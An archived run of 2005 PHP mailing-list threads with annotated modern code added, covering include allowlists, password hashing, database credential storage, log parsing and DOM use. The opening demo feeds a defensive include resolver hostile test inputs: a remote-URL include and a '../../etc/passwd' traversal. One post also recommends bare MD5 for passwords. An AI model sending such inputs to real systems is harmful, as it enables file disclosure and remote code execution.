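        return null; // base directory or target file does not exist
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $path;
}

// --- demo on a throwaway directory ---
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . DIRECTORY_SEPARATOR . 'home.php', '<?php echo "home page\n";');

$allowed  = ['home', 'contact'];            // 'contact' is allowlisted but has no file
$requests = [
    'home',
    'contact',
    'http://www.domain.net/file.inc',       // the URL form quoted earlier in the thread
    '../../etc/passwd',
    'HOME',                                 // allowlist match is exact and case-sensitive
];

foreach ($requests as $request) {
    $target = resolve_include($request, $allowed, $baseDir);
    if ($target === null) {
        echo "refused: $request\n";
        continue;
    }
    include $target;
}

unlink($baseDir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($baseDir);
```

PHP 5.2 and later ship a separate `allow_url_include` setting alongside `allow_url_fopen`, which is the split this thread asks for; the allowlist check still matters for local paths.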

attached mail follows:


I'm a little bit late in on this one, and asking questions after the problem
is solved is a bit academic, but I am curious about one thing - Does the
debian package do reverse lookups to try to get a name for the visiting IP
address? Every page request taking 5 seconds sounds like a name lookup
failure to me.

regards
Markus

On Tuesday 01 March 2005 13:45, Gerard wrote:
> > It looks like you are using Debian and probably did an apt-get install
> > php. Why don't you try compiling php by hand without all the extra
> > crap that I'm sure you don't need then try it. I think you will be
> > much happier. Debian is great software, but when it comes to things
> > like web services and php it is much better to compile by hand to get
> > the best performance.
>
> Thanks for that one! After a manual compile it all works fine :D
>
> - Gerard

attached mail follows:


On Tue, 01 Mar 2005 11:11:47 -0500, bob <phpgenantonakis.co.uk> wrote:
> Well, this time it took just 11 days to get my first bit of spam from
> this mailing list.
>
Do you mean the spam was from php-generallists.php.net ?

Or do you mean that you know for sure that your address was harvested
from this list?

I've not noticed getting any extra spam since joining, personally.
Don't forget that:

a) Emails you send to this list may be forwarded elsewhere, with your
address included
b) The email address you use for this list may have been 'brute-forced'
c) Some malicious oik may have posted your address somewhere else world-readable
d) You might have accidentally posted it someplace else (eg register
for access to our forums, we promise not to use it for blah blah blah,
please tick a box, etc, etc).

--
AdamT
"Justify my text? I'm sorry, but it has no excuse."

attached mail follows:


Alberto,
    Thank you for your explanation and your example code. I think this
is how I am going to go forward in allowing my users to input links.
    Your time in replying is much appreciated.

    Dave

attached mail follows:


Hi,

I have a problem with the DOM extension in PHP5. I simply want to create
a DocumentFragment which can be used in ImportNode, for example. I know
that the code below may look a little bit strange, but I've
simplified it as much as possible.

The code should print the contents of the fragment, which is part
of the DomDocument. When you run this code you'll see that the result
is an empty string.

Does anyone have any idea if this behaviour is correct, or if this
might be a PHP bug?
If I'm doing something wrong, could you please tell me what's wrong?

Thank you for your Help.

Regards

Tobias

<?php
$xmlData = <<<XMLDATA
<?xml version="1.0" encoding="ISO-8859-1" ?>
<root>
        <subElement>content</subElement>
</root>
XMLDATA;

$dom = new DomDocument;
$dom->loadXML( $xmlData );

$dom2 = new DomDocument;
$fragment = $dom2->createDocumentFragment();
foreach( $dom->childNodes AS $node ) {
        $newNode = $dom2->importNode( $node, true );
        $fragment->appendChild( $newNode );
}
$dom2->appendChild( $fragment );

echo $dom2->saveXML( $fragment );
?>

attached mail follows:


Here is a modified version of the code that you posted that should
explain it.

<?php
$xmlData = <<<XMLDATA
<?xml version="1.0" encoding="ISO-8859-1" ?>
<root>
        <subElement>content</subElement>
</root>
XMLDATA;

$dom = new DomDocument;
$dom->loadXML( $xmlData );

$dom2 = new DomDocument;
$fragment = $dom2->createDocumentFragment();
foreach( $dom->childNodes AS $node ) {
        $newNode = $dom2->importNode( $node, true );
        /** This is the (undocumented?) way to get the value of a text node */
        var_dump($newNode->nodeValue);
        $fragment->appendChild( $newNode );
        /** Now we see what the value of the $fragment is */
        var_dump($fragment);
}
$dom2->appendChild( $fragment );

/** Finally, we echo the XML of the new document */
echo $dom2->saveXML();
?>

--
Teach a man to fish...

NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-general&w=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY |
http://mycroft.mozdev.org/download.html?name=PHP&submitform=Find+search+plugins

attached mail follows:


-----Original Message-----
From: Bret Hughes
Sent: 01/03/05 18:43

On Tue, 2005-03-01 at 11:44, Sascha Kaufmann wrote:
> $birthday = $day.'.'.$month.'.'.$year;
>

why wouldn't

$birthday = "$day.$month.$year";

work as well.
---------------------------

It would -- which to use is a matter of personal preference.

Cheers!

Mike

To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm

attached mail follows:


Mike Ford wrote:

> -----Original Message-----
> From: Bret Hughes
> Sent: 01/03/05 18:43
>
> On Tue, 2005-03-01 at 11:44, Sascha Kaufmann wrote:
>
>>$birthday = $day.'.'.$month.'.'.$year;
>>
>
>
> why wouldn't
>
> $birthday = "$day.$month.$year";
because it does work as well

>
> work as well.
> ---------------------------
>
> It would -- which to use is a matter of personal preference.
>
> Cheers!
>
> Mike
>
>
> To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm

attached mail follows:


Please note that my name is DAN TAPPIN not DAN TRAINOR
<infohostinthebox.net>. Although our last names start with the same
letter you will note that the following characters and our email
addresses are different.

Please double check your facts before you open your big fat ranting
mouths.

Dan Tappin (The list member formerly known as Dan T)

Side Note:

I could really give a rats-a** if Dan Trainor hosts adult material. If
the subjects are of age then get over it. They are adults - they made
their choices. There is a little thing here called personal
responsibility. Why do some people insist on trying to save everyone
from themselves and force morality down everyone's throat?

On Mar 1, 2005, at 7:36 PM, Rory Browne wrote:

> Dan
> I think you could have handled this better. I don't have a problem
> with your choice of business, provided you aren't exploiting, forcing,
> or underpaying, your 'content-sources'. On the other hand I resent the
> way you've spoken to friends of mine. Also from looking through your
> responses, I note a hint of hypocrisy.
>
> In future I suggest showing respect, to people who in the community's
> view have earned it, until such time as you have built up the
> credibility to do otherwise.
>
> Suggestion - figure out what you want, STFW, and if you can't find
> what you need, get someone to program it.
>
>
>
> On Tue, 1 Mar 2005 13:53:32 -0700, Dan Tappin <danorourke.ca> wrote:
>> What about using a simple session database to ensure multiple logins
>> are not allowed. You can create a session, store the session ID in
>> mysql. If the same user tries to login again from a different
>> location
>> i.e. new session ID you can lock them out / log this activity.
>>
>> You really can't prevent the shared password issue unless you billed
>> on
>> a per login basis. The bottom line is that you end up accepting that
>> you grant access to a user you give up controlling the sharing. You
>> can only prevent multiple login's which is pretty good. It really
>> does
>> not matter if two people use the site 12 hours per day or one 24 hours
>> per day.
>>
>> You can track IP's to look for suspected sharing i.e. use ARIN / RIPE
>> look-ups and see if the same user log's in from multiple subnets. I
>> would think that this would be quite easy with PHP and a MySQL type
>> log.
>>
>> Do your best to limit abuse and move on.
>>
>> Dan T
>>
>> --
>> PHP General Mailing List (http://www.php.net/)
>> To unsubscribe, visit: http://www.php.net/unsub.php
>>
>>
>

attached mail follows:


The best way is to not store the password at all.

Store a hash of the password like this:

INSERT INTO users SET pass = MD5('password');

Now not knowing how you authenticate those passwords this might not
work.

If it's an internal web page via PHP all you do is MD5 the user's
supplied password and compare to your DB.

Dan Tappin (The other Dan T)

On Mar 1, 2005, at 5:09 PM, Rob Tanner wrote:

> WE have a number of PHP webpages that access one of several MySql
> databases
> and while the PHP files that contain the passwords cannot be accessed
> via the
> web, we are becoming increasingly concerned over the possibility of
> other
> webpage maintainers viewing those files. How have other folks
> protected
> database passwords needed by PHP apps?
>
> Thanks.
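
The hash-and-compare login check described in the message above, as an added example that is not part of the original post. It assumes PHP 7 or later and swaps in `password_hash()`/`password_verify()` (a salted, adaptive hash) for bare MD5, upgrading a legacy MD5 row the first time its owner logs in; the `$users` array stands in for the users table and its rows are constructed.

```php
<?php
// Added example, not from the thread. $users stands in for the users table;
// the accounts and passwords in it are constructed.

/** A bare MD5 digest is exactly 32 lowercase hex characters. */
function is_legacy_md5(string $stored): bool
{
    return preg_match('/^[0-9a-f]{32}$/', $stored) === 1;
}

/**
 * Check a login and, on success, replace a legacy MD5 value (or an outdated
 * password_hash() value) with a fresh password_hash() of the same password.
 */
function check_login(array &$users, string $name, string $password): bool
{
    // Hash verified for unknown users so their requests cost about the same
    // time as requests for real accounts.
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash('placeholder', PASSWORD_DEFAULT);
    }

    if (!isset($users[$name])) {
        password_verify($password, $dummy);
        return false;
    }
    $stored = $users[$name];

    if (is_legacy_md5($stored)) {
        // hash_equals() compares in constant time.
        if (!hash_equals($stored, md5($password))) {
            return false;
        }
        // The plaintext is only available now, at login: upgrade the row.
        $users[$name] = password_hash($password, PASSWORD_DEFAULT);
        return true;
    }

    if (!password_verify($password, $stored)) {
        return false;
    }
    if (password_needs_rehash($stored, PASSWORD_DEFAULT)) {
        $users[$name] = password_hash($password, PASSWORD_DEFAULT);
    }
    return true;
}

// --- demo with constructed rows ---
$users = [
    'alice' => md5('correct horse'),                             // legacy row
    'bob'   => password_hash('battery staple', PASSWORD_DEFAULT),
];

var_dump(check_login($users, 'alice', 'wrong guess'));    // rejected, row untouched
var_dump(is_legacy_md5($users['alice']));                 // still MD5
var_dump(check_login($users, 'alice', 'correct horse'));  // accepted
var_dump(is_legacy_md5($users['alice']));                 // row has been upgraded
var_dump(check_login($users, 'alice', 'correct horse'));  // still accepted afterwards
var_dump(check_login($users, 'bob', 'battery staple'));
var_dump(check_login($users, 'mallory', 'anything'));     // unknown user
```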

attached mail follows:


Dan Tappin <mailto:danorourke.ca>
    on Wednesday, March 02, 2005 7:32 AM said:

> The best way is to not store the password at all.
>
> Store a hash of the password like this:
>
> INSERT INTO users SET pass = MD5('password');
>
> Now not knowing how you authenticate those passwords this might not
> work.
>
> If it's an internal web page via PHP all you do is MD5 the user's
> supplied password and compare to your DB.

But that doesn't help in this situation because the OP is not referring
to passwords for users of the website but rather the password(s) for
MySQL so that the application can access the db.

Chris.

attached mail follows:


Rob Tanner wrote:
> We're a four year college. Some maintainers are faculty, some are
> staff and some are work-study (students) and centrally we have little
> say over who can and can't.

You can put super crucial username/passwords into httpd.conf or
root-readable files that get included into httpd.conf

Other than that, the basic rule to remember is:
If PHP can read the password, so can anybody with a login.

If that's not acceptable for that password, you have very few options:

Move it to httpd.conf
Get rid of that user

Maybe you need to re-structure your server and its access levels to
reflect reality.

You probably trust faculty/staff more than students in terms of
intentional abuse.

Though naivete and ignorance might go the other way 'round. :-)

You *could* run two pools of Apache servers, with two different configs,
and two different PHP users, and give different User/Group settings in the
two different httpd.conf files to separate your faculty/staff from your
students.

Though it might be cheaper to just buy a stock Linux box and move all the
students to that box -- where you simply accept the fact that students are
going to mess it up more than the faculty/staff box.

At any rate, the problem is simply not solvable by PHP, and, when you get
right down to it, not even in the PHP realm.

Whatever trust level you have or don't have, the database passwords being
readable by untrusted users who have logins is lower on the problem stack
than a zillion other nasty things they can do if they have a login and you
don't trust them.

Fixing the passwords may well have looked like the easiest one to tackle,
but it's not that easy at all, and you won't improve your general security
health level even if it *was* something easy to fix, as the perpetrators
would simply turn aside from db access and do more... interesting...
things with their logins.

PS Finding a perpetrator and penalizing them harshly and publicly may wake
up some students to the risks of what they are doing. Or not... Worth
considering.

--
Like Music?
http://l-i-e.com/artists.htm
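
One way to set up the httpd.conf approach from the message above, as an added example that is not part of the original post. It assumes Apache with mod_env and mod_php; the file paths, variable names and values are hypothetical, and the `$server` array in the demo is constructed.

```php
<?php
// Added example; paths, variable names and values below are hypothetical.
//
// Apache side (parsed as root at startup, before the workers switch to the
// unprivileged User/Group, so the file needs no read bit for anyone else):
//
//   # httpd.conf
//   Include /etc/httpd/private/db-secrets.conf
//
//   # /etc/httpd/private/db-secrets.conf   (chown root:root, chmod 600)
//   SetEnv APP_DB_DSN  "mysql:host=127.0.0.1;dbname=registrar"
//   SetEnv APP_DB_USER "registrar_web"
//   SetEnv APP_DB_PASS "placeholder-not-a-real-password"

const REQUIRED_KEYS = ['APP_DB_DSN', 'APP_DB_USER', 'APP_DB_PASS'];

/** Pull the database settings out of $_SERVER, failing closed if any is absent. */
function load_db_settings(array $server): array
{
    $settings = [];
    $missing  = [];
    foreach (REQUIRED_KEYS as $key) {
        $value = $server[$key] ?? '';
        if (!is_string($value) || $value === '') {
            $missing[] = $key;
            continue;
        }
        $settings[$key] = $value;
    }
    if ($missing) {
        // Report the names only, never whatever partial values were present.
        throw new RuntimeException('database settings missing: ' . implode(', ', $missing));
    }
    return $settings;
}

/** Copy of $_SERVER that is safe to write to a debug log. */
function redact_for_log(array $server): array
{
    foreach (REQUIRED_KEYS as $key) {
        if (isset($server[$key])) {
            $server[$key] = '[redacted]';
        }
    }
    return $server;
}

/** Connect without letting a failed connection leak credentials in a trace. */
function open_db(array $settings): PDO
{
    try {
        return new PDO(
            $settings['APP_DB_DSN'],
            $settings['APP_DB_USER'],
            $settings['APP_DB_PASS'],
            [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
        );
    } catch (PDOException $e) {
        // The original exception's backtrace can carry the constructor arguments.
        throw new RuntimeException('database connection failed');
    }
}

// --- demo with a constructed array; a real page would pass $_SERVER ---
$server = [
    'REQUEST_URI' => '/grades.php',
    'APP_DB_DSN'  => 'mysql:host=127.0.0.1;dbname=registrar',
    'APP_DB_USER' => 'registrar_web',
    'APP_DB_PASS' => 'placeholder-not-a-real-password',
];

$settings = load_db_settings($server);
echo 'would connect as ', $settings['APP_DB_USER'], "\n";
print_r(redact_for_log($server));

try {
    load_db_settings(['APP_DB_USER' => 'registrar_web']);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```

Any PHP script served by the same Apache instance can still read these values, and `phpinfo()` prints them, so this only keeps the password out of files that other maintainers can open.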

attached mail follows:


Our mailserver writes a logfile every day, but it takes hours to analyse it
manually.

I (newbie) am trying to write a PHP script that reads the logfile line by
line and tries to get a top 50 of spammers/clients that mail too much...

I can get line by line all information like email address, from, to, bytes
sent, but how to store it in an array?
If a line is read and the email address is already present in the array, it
should not add this email address again, but add a counter +1.

In the end I want an array containing all email addresses and how often they
were counted.

This is how far I got: (sorry, it is in Dutch)
It shows all from and to email addresses. Not bad for a newbie, but it took one
week to do.....

<?php
$fp="";$line="";$aantal=0;

echo "<TABLE BORDER=3>";
echo "<TR><TD ALIGN=\"center\"> From:</TD><TD
ALIGN=\"center\">To:</TD></TR>";
if($fp = fopen("C:\smtp\SMTP-Activity-050226.log","r")) {
    while (!feof ($fp)) {
       $line = fgets($fp, 4096);
       if(strstr($line,"SMTP-IN")) {
          if(strstr($line,"MAIL FROM" )) {
          $aantal++;
          $start=strpos($line,"<");
          $end=strpos($line,">");
          $from=str_replace(">", " ", str_replace("<", " ",
substr($line,$start,$end-$start)));
          echo "<TR><TD>".$from."</TD>";
                    }
          if(strstr($line,"RCPT TO" )) {
          $start=strpos($line,"<");
          $end=strpos($line,">");
          echo "<TD>" . str_replace(">", " ", str_replace("<", " ",
substr($line,$start,$end-$start)))."</TD>";
          }
          }
          }
echo "</TR></TABLE>";
fclose($fp);
          }
echo "Totaal aantal: $aantal <BR>";
?>

attached mail follows:


woldhekkie wrote:
> Our mailserver writes a logfile every day, but it takes hours to analyse
> it
> manualy.
>
> I (newby) am trying to write a php script that reads the the logfile line
> by
> line and try to get a top 50 of spammers/clients that mail too much...
>
> I can get line by line all information like email-adres, from , to , bytes
> send , but how to store it in a array ?
> If a line is read and the emailadres already pressent in the array, it
> should not ad this emailadress again, but add a counter +1
>
> In the end i want an array containing all emailadreses and how often they
> were counted.
>
> This is how far i get: (sorry, it is in Dutch)
> It shows all from and to emailadresses. Not bad for a newby, but it took
> one
> week to do.....
>
> <?php
> $fp="";$line="";$aantal=0;

$emails = array(); //maybe use $froms = array(); $tos = array();

> echo "<TABLE BORDER=3>";
> echo "<TR><TD ALIGN=\"center\"> From:</TD><TD
> ALIGN=\"center\">To:</TD></TR>";
> if($fp = fopen("C:\smtp\SMTP-Activity-050226.log","r")) {
> while (!feof ($fp)) {
> $line = fgets($fp, 4096);
> if(strstr($line,"SMTP-IN")) {
> if(strstr($line,"MAIL FROM" )) {
> $aantal++;
> $start=strpos($line,"<");
> $end=strpos($line,">");
> $from=str_replace(">", " ", str_replace("<", " ",
> substr($line,$start,$end-$start)));

$emails[$from]++; //maybe use $froms[$email]++;

//Fancier version:
$emails[$from] = isset($emails[$from]) ? $emails[$from] + 1 : 1;

> echo "<TR><TD>".$from."</TD>";
> }
> if(strstr($line,"RCPT TO" )) {
> $start=strpos($line,"<");
> $end=strpos($line,">");

//Same pattern as above
$to = str_replace(">", " ", str_replace("<", " ",
substr($line,$start,$end-$start)));
$emails[$to]++;

> echo "<TD>" . str_replace(">", " ", str_replace("<", " ",
> substr($line,$start,$end-$start)))."</TD>";
> }
> }
> }
> echo "</TR></TABLE>";
> fclose($fp);
> }
> echo "Totaal aantal: $aantal <BR>";

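echo "Top 10:<table>";
arsort($emails);
// each() was removed in PHP 8, so take the first 10 entries with array_slice();
// this also stops cleanly when fewer than 10 addresses were seen.
foreach (array_slice($emails, 0, 10, true) as $email => $count) {
  // Addresses come straight from the mail log, so escape them before printing as HTML
  $email = htmlspecialchars($email, ENT_QUOTES);
  echo "<tr><td align='right'>$email</td><td align='right'>$count</td></tr>\n";
}
echo "</table>";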

//If you want $froms/$tos separate, copy/paste code above and do it for both

> ?>

--
Like Music?
http://l-i-e.com/artists.htm

attached mail follows:


----- Original Message -----
From: "yangshiqi" <yangshiqi3721.com>
To: "'Tom Whitbread'" <tomretinalnerve.com>; "'php-general lists'"
<php-generallists.php.net>
Sent: Wednesday, March 02, 2005 4:36 AM
Subject: RE: [PHP] Setting cookie on first visit

> When the user first visits your site, there is no skin in your cookie.
> Then
> you can give a default value. And after the user modifies his/her profile,
> you can set it to the cookie. So I don't think it is a problem of setting
> cookie.
>
>
> Best regards,
> Yang Shiqi
>
>
>
>
> -----Original Message-----
> From: Tom Whitbread [mailto:tomretinalnerve.com]
> Sent: Wednesday, March 02, 2005 5:18 PM
> To: php-general lists
> Subject: [PHP] Setting cookie on first visit
>
> I am using a cookie to detect what skin a user wants to display. The
> problem is if a user visits the site for the first time the cookie is
> not being set. I am detecting if its being set or not with
>
> if(!isset($_COOKIE['skin'])){ ... }
>
> It's not setting the cookie until a user refreshes the page once. How
> can I ensure it's set when it hasn't been set before?
>

attached mail follows:


Hello!

Is there anyone who has some experience in connecting to a IBM AS/400
server with PHP? Any ideas where to start?

Regards,

Frank
________________________________________________
Frank Arensmeier
Marketing Support

NIKE HYDRAULICS AB
Box 1107
631 80 Eskilstuna
Sweden

tel +46 16 82 34
fax +46 16 13 93 16
email: frank.arensmeiernikehydraulics.se
www.nikehydraulics.com

attached mail follows:


Frank Arensmeier wrote:
> Is there anyone who has some experience in connecting to a IBM AS/400
> server with PHP? Any ideas where to start?

I know somebody reported success back in the day on this list...

Actually, it's so far back in the day, it just might be on the predecessor
to this list, back when all PHP discussion took place pretty much on one
single list... But I don't think it's *that* far back.

Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days,
possibly, but not before, as that's when I joined up.

I think they were using "AS400" or "AS 400" without the "/" in their posts.

IIRC (and that's a big "IF"):
They originally had nothing, then they got read access, then they achieved
write access, finally, but I think there was something really skanky about
getting the write access that made them not real happy with the
solution... Like I think it required having "root" be a bit too wide open
permissive on the AS/400 end.

Fortunately, the list archives of this list and even that old list are
linked from:
http://php.net/mailing-lists.php

Start with the PHP-General, as I suspect it's in there, though it *could*
be back in the old old list.

PS I'm assuming you want to connect to "the database" on an AS/400 and
that that database is the standard and only database that shipped on those
suckers. P-something, right?

PPS You'd probably be best off getting a CSV dump and migrating to
hardware/OS less, shall we say, antiquated? :-)

PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely
highly suspect info in this post.

--
Like Music?
http://l-i-e.com/artists.htm

attached mail follows:


Richard, you are my man! Thank you for the hints you gave me. I will do
some digging in the list archives tonight.

Thank you.

/frank

2005-03-02 kl. 19.57 skrev Richard Lynch:

> Frank Arensmeier wrote:
>> Is there anyone who has some experience in connecting to a IBM AS/400
>> server with PHP? Any ideas where to start?
>
> I know somebody reported success back in the day on this list...
>
> Actually, it's so far back in the day, it just might be on the
> predecessor
> to this list, back when all PHP discussion took place pretty much on
> one
> single list... But I don't think it's *that* far back.
>
> Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days,
> possibly, but not before, as that's when I joined up.
>
> I think they were using "AS400" or "AS 400" without the "/" in their
> posts.
>
> IIRC (and that's a big "IF"):
> They originally had nothing, then they got read access, then they
> achieved
> write access, finally, but I think there was something really skanky
> about
> getting the write access that made them not real happy with the
> solution... Like I think it required having "root" be a bit too wide
> open
> permissive on the AS/400 end.
>
> Fortunately, the list archives of this list and even that old list are
> linked from:
> http://php.net/mailing-lists.php
>
> Start with the PHP-General, as I suspect it's in there, though it
> *could*
> be back in the old old list.
>
> PS I'm assuming you want to connect to "the database" on an AS/400 and
> that that database is the standard and only database that shipped on
> those
> suckers. P-something, right?
>
> PPS You'd probably be best off getting a CSV dump and migrating to
> hardware/OS less, shall we say, antiquated? :-)
>
> PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely
> highly suspect info in this post.
>
> --
> Like Music?
> http://l-i-e.com/artists.htm
>

attached mail follows:


According to Larry Hotchkiss on Jan 31,2001

<Quote>

It's my understanding that you use the odbc functions to access db/2
400. I also recall reading that the db2/400 functionality is true db2
functionality and does not use the generic odbc layer even though it is
grouped in. Apparently it's smart enough to know. Depending on where you
got your windows ver of php, you should just be able to uncomment the
line in your php.ini so it can use odbc and make sure the extension path
is set correctly.

<end Quote>

--
<?php
/*

Stephen Johnson c | eh
The Lone Coder

http://www.thelonecoder.com
stephenthelonecoder.com

562.924.4454 (office)
562.924.4075 (fax)

continuing the struggle against bad code

*/
?>

> From: "Richard Lynch" <ceol-i-e.com>
> Reply-To: ceol-i-e.com
> Date: Wed, 2 Mar 2005 10:57:30 -0800 (PST)
> To: "Frank Arensmeier" <frank.arensmeiernikehydraulics.se>
> Cc: "php list general" <php-generallists.php.net>
> Subject: Re: [PHP] Connecting to a AS/400?
>
> Frank Arensmeier wrote:
>> Is there anyone who has some experience in connecting to a IBM AS/400
>> server with PHP? Any ideas where to start?
>
> I know somebody reported success back in the day on this list...
>
> Actually, it's so far back in the day, it just might be on the predecessor
> to this list, back when all PHP discussion took place pretty much on one
> single list... But I don't think it's *that* far back.
>
> Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days,
> possibly, but not before, as that's when I joined up.
>
> I think they were using "AS400" or "AS 400" without the "/" in their posts.
>
> IIRC (and that's a big "IF"):
> They originally had nothing, then they got read access, then they achieved
> write access, finally, but I think there was something really skanky about
> getting the write access that made them not real happy with the
> solution... Like I think it required having "root" be a bit too wide open
> permissive on the AS/400 end.
>
> Fortunately, the list archives of this list and even that old list are
> linked from:
> http://php.net/mailing-lists.php
>
> Start with the PHP-General, as I suspect it's in there, though it *could*
> be back in the old old list.
>
> PS I'm assuming you want to connect to "the database" on an AS/400 and
> that that database is the standard and only database that shipped on those
> suckers. P-something, right?
>
> PPS You'd probably be best off getting a CSV dump and migrating to
> hardware/OS less, shall we say, antiquated? :-)
>
> PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely
> highly suspect info in this post.
>
> --
> Like Music?
> http://l-i-e.com/artists.htm
>

attached mail follows:


You need to be clearer on 'connecting to'.

Do you mean FTP, MySQL etc???

Dan Tappin

On Mar 2, 2005, at 8:54 AM, Frank Arensmeier wrote:

> Hello!
>
> Is there anyone who has some experience in connecting to a IBM AS/400
> server with PHP? Any ideas where to start?
>
> Regards,
>
> Frank
> ________________________________________________
> Frank Arensmeier
> Marketing Support
>
> NIKE HYDRAULICS AB
> Box 1107
> 631 80 Eskilstuna
> Sweden
>
> tel +46 16 82 34
> fax +46 16 13 93 16
> email: frank.arensmeiernikehydraulics.se
> www.nikehydraulics.com
>

attached mail follows:


Hi,

I'm thinking of updating my mysql-server from 3.23 to 4.1.10, and I
can't find any serious information if I would have to rebuild php too.

Has anybody tried this already?

system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52

thanks peter

attached mail follows:


Hi,

I'm thinking of updating my mysql-server from 3.23 to 4.1.10, and I
can't find any serious information if I would have to rebuild php too.

Has anybody tried this already?

system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52

thanks peter

attached mail follows:


Peter wrote:
> Hi,
>
> i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i
> can't find any serious information if i would have to rebuild php too.
>
> anybody tryed this already??
>
> system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52
>
> thanks peter
>

Please don't spam the list with multiple messages asking the same question.

Before you 'upgrade', ask yourself, "Do I need to upgrade?".

What features do you need in 4.1.x that are not present in 3.x?

If the answer to that is 'none', you're probably better off leaving it
alone. If you still feel you _have_ to upgrade, think about using the
4.0.x version instead of 4.1.x. If you 'upgrade' to MySQL 4.1.x, and
don't go with PHP5, you really haven't done anything for your apps, as
you won't be able to take advantage of some of the new features.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
johnkegworks.com

attached mail follows:


Sorry, I googled again, read nearly every post which contains mysql and
upgrade but I can't find a useful answer in this list. Perhaps it's me...

So my question is still the same, would I have to recompile php or not?

peter

NG
What does need mean?
Nobody needs an internet; using mysql4 would just make things easier
(like using nested SELECTS)

... Sure there is a lot of spam at the list. I did not ask for
"reasons for an upgrade" because I already knew about that, so the next
one who is googling for the problem gets annoyed by the unuseful answer

John Nichel schrieb:
> Peter wrote:
>
>> Hi,
>>
>> i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i
>> can't find any serious information if i would have to rebuild php too.
>>
>> anybody tryed this already??
>>
>> system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52
>>
>> thanks peter
>>
>
> Please don't spam the list with multiple messages asking the same question.
>
> Before you 'upgrade', ask yourself, "Do I need to upgrade?".
>
> What features do you need in 4.1.x that are not present in 3.x?
>
> If the answer to that is 'none', you're probably better off leaving it
> alone. If you still feel you _have_ to upgrade, think about using the
> 4.0.x version instead of 4.1.x. If you 'upgrade' to MySQL 4.1.x, and
> don't go with PHP5, you really haven't done anything for your apps, as
> you won't be able to take advantage of some of the new features.
>

attached mail follows:


Peter wrote:
> sorry, i googled again, read nearly every post which contains mysql and
> upgrade but i can't find a useful answer in this list. perhaps it's me...
>
> so my question is still the same, would i have to recompile php or not

No, you don't. However, mysql >= 4.1 uses a new authentication protocol,
read http://dev.mysql.com/doc/mysql/en/old-client.html

attached mail follows:


Peter wrote:
> sorry, i googled again, read nearly every post which contains mysql and
> upgrade but i can't find a useful answer in this list. perhaps it's me...
>
> so my question is still the same, would i have to recompile php or not
>
> peter
>
> NG
> what means need?
> nobody needs an internet, using mysql4 would just make things easier
> (like using nested SELECTS)
>
> ... sure there is a lot of spam at the list, i did not ask for
> "reasons for an upgrade" because i already knew about that, so the next
> one who is googling for the problem gets annoyed of the unuseful answer
>

Well then far be it from me to try and help in a manner that is
unacceptable to you. Maybe I should just go back to my standard answer...

http://www.google.com/search?q=php+upgrade+mysql+4.1

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
johnkegworks.com

attached mail follows:


I recommend Mambo or Geeklog. They aren't overdone and pretty easy to
implement. Best of all, they are free.

Jud.

Judson Vaughn
judseitervaughn.com | judbizville.com
Seiter Vaughn Communications
12455 Plowman Court
Herndon, VA 20170
703.450.9740
svc

Kostyantyn Shakhov wrote:
> I've got an order for the media portal. Thus, I'm looking for open
> source portal systems. The first that comes to my mind is PHP-Nuke, but I
> heard that it requires a powerful server and I'll have just a
> middle-level one. So, does someone know other PHP-based open
> source portal systems? Thank you in advance.
>

attached mail follows:


Hi,

I am trying to modify the php.ini settings for post_max_size and upload_max_filesize to allow for a custom script to upload files larger than 8MB, the default size limit set in php.ini. This is on a shared server, and my hosting company won't modify the limitation, although they will charge me $50/hr to code a custom script. Whatever! I'll just do it myself... but I don't know how.

Also, http://docs.php.net/en/function.ini-set.html tells me that for post_max_size and upload_max_filesize: "Entry can be set in php.ini, .htaccess or httpd.conf."

Any help would be greatly appreciated!!

Thanks,

Matt Cassarino
Cell: (206) 484-4626
Web: www.mattcass.com
Email: mcmattcass.com

attached mail follows:


From: Ian Firla <ifirlaaegissrl.it>
To: Matt Cassarino <mcmattcass.com>
Cc: php-generallists.php.net
Content-Type: text/plain
Date: Wed, 02 Mar 2005 19:44:24 +0100
Message-Id: <1109789064.8823.19.camellocalhost.localdomain>
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Subject: Re: [PHP] Bypassing php.ini setting for file uploads?

There're all kinds of threads on this if you google around for a bit but
one good one in my bookmarks is:

http://www.webdevforums.com/showthread.php?tr31

Ian

On Wed, 2005-03-02 at 09:39 -0800, Matt Cassarino wrote:
>Hi,
>
>I am trying to modify the php.ini settings for post_max_size and upload_max_filesize to allow for a custom script to upload files larger than 8MB, the default size limit set in php.ini. This is on a shared server, and my hosting company won't modify the limitation, although they will charge me $50/hr to code a custom script. Whatever! I'll just do it myself... but I don't know how.
>
>Also, http://docs.php.net/en/function.ini-set.html tells me that for post_max_size and upload_max_filesize: "Entry can be set in php.ini, .htaccess or httpd.conf."
>
>Any help would be greatly appreciated!!
>
>Thanks,
>
>Matt Cassarino
>Cell: (206) 484-4626
>Web: www.mattcass.com
>Email: mcmattcass.com

attached mail follows:


Matt Cassarino wrote:
> I am trying to modify the php.ini settings for post_max_size and
> upload_max_filesize to allow for a custom script to upload files larger
